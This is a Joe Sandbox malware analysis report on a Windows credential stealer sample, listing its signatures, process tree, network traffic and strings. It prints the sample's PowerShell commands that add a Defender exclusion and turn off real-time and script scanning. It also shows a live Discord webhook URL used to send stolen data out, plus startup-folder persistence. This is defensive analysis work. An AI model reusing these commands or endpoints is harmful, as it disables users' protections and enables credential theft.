Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https___files.catbox.moe_l2rczc.pif.exe

Overview

General Information

Sample name:https___files.catbox.moe_l2rczc.pif.exe
Analysis ID:1569372
MD5:e09f55d421cb45340a8c97c217ba56cf
SHA1:2280afe7bb2d07c315e2599c21f069dd1b7ce3b8
SHA256:1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
Tags:exepifuser-Racco42
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • https___files.catbox.moe_l2rczc.pif.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe" MD5: E09F55D421CB45340A8C97C217BA56CF)
    • powershell.exe (PID: 7668 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7816 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7912 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 8108 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 8180 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7276 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3964 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 2844 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 2600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7300 cmdline: "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
https___files.catbox.moe_l2rczc.pif.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1345806847.000001EBB4D82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: https___files.catbox.moe_l2rczc.pif.exe PID: 7504JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          0.0.https___files.catbox.moe_l2rczc.pif.exe.1ebb4d80000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe", ParentImage: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ParentProcessId: 7504, ParentProcessName: https___files.catbox.moe_l2rczc.pif.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', ProcessId: 7668, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe", ParentImage: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ParentProcessId: 7504, ParentProcessName: https___files.catbox.moe_l2rczc.pif.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7912, ProcessName: powershell.exe
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ProcessId: 7504, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TqmmU.scr
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe", ParentImage: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ParentProcessId: 7504, ParentProcessName: https___files.catbox.moe_l2rczc.pif.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', ProcessId: 7668, ProcessName: powershell.exe
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ProcessId: 7504, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TqmmU.scr
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ProcessId: 7504, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TqmmU.scr
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ProcessId: 7504, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TqmmU.scr
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe", ParentImage: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe, ParentProcessId: 7504, ParentProcessName: https___files.catbox.moe_l2rczc.pif.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe', ProcessId: 7668, ProcessName: powershell.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https___files.catbox.moe_l2rczc.pif.exeAvira: detected
            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrReversingLabs: Detection: 91%
            Source: https___files.catbox.moe_l2rczc.pif.exeReversingLabs: Detection: 91%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scrJoe Sandbox ML: detected
            Source: https___files.catbox.moe_l2rczc.pif.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED23AA CryptUnprotectData,0_2_00007FF887ED23AA
            Source: C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exeCode function: 0_2_00007FF887ED290C CryptUnprotectData,0_2_00007FF887ED290C
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.9:49819 version: TLS 1.2
            Source: https___files.catbox.moe_l2rczc.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 162.159.135.232 162.159.135.232
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: discord.com
            Source: unknownHTTP traffic detected: POST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 887Expect: 100-continueConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 17:24:17 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1733419458x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1gVsW50mnsi2U%2BQXe9NxMshj3MQ24pNrfJ3l5v4AP6%2B%2B52JFzIkovEeKbhT6Csk2rn8CsveFSYIVuCuH7Ry8kcKkoCyNki%2F2wVBPOtDRbtFEupMzt%2FclvmLfyGAh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=181917c39b8d85f679bb45cd12b4d63c5a4dc2f7-1733419457; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=g1B4may2JrsF2zOjUVlV6hoyAZ0t1U.NdCEU26Jj4NU-1733419457053-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ed5ba949e4f1869-EWR{"message": "Unknown Webhook", "code": 10015}
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 17:24:20 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1733419461x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7WyWyjDLePnq502kvr%2FawAIHyqeojuKGTqRqoqhVrPIjSwNxz74L7OL7QnnahhfODn6RTjuoLvHbylzfKomCR6gmN%2FKwt%2Fahmn3uPze7treuBSONE68H9e6NPU55"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8ed5baa148145e7f-EWR{"message": "Unknown Webhook", "code": 10015}
            Source: powershell.exe, 00000002.00000002.1447575965.000001F9E65E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6DD0000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB71C1000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB71C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545P
            Source: https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
            Source: powershell.exe, 00000002.00000002.1440681489.000001F9DDF84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3ABC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC5308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A1647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000012.00000002.1675792920.0000021A14D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.1423393930.000001F9CE138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1423393930.000001F9CDF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1459431559.0000022300084000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A14B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.1423393930.000001F9CE138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000E.00000002.1564105869.000001DEC4EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000012.00000002.1675792920.0000021A14D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.1423393930.000001F9CDF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1459431559.0000022300044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1459431559.000002230005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A14B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6DD0000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
            Source: TqmmU.scr.0.drString found in binary or memory: https://discord.com/api/v10/users/
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6DD0000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6A01000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8Ts
            Source: https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
            Source: powershell.exe, 00000012.00000002.1675792920.0000021A14D82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: TqmmU.scr.0.drString found in binary or memory: https://github.com/PyDevOG/Divulge-Stealer
            Source: powershell.exe, 0000000E.00000002.1635457819.000001DEDBE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
            Source: powershell.exe, 00000012.00000002.1675792920.0000021A15FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000E.00000002.1635457819.000001DEDBE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsofx
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
            Source: https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drString found in binary or memory: https://gstatic.com/generate_204g==================Divulge
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
            Source: https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
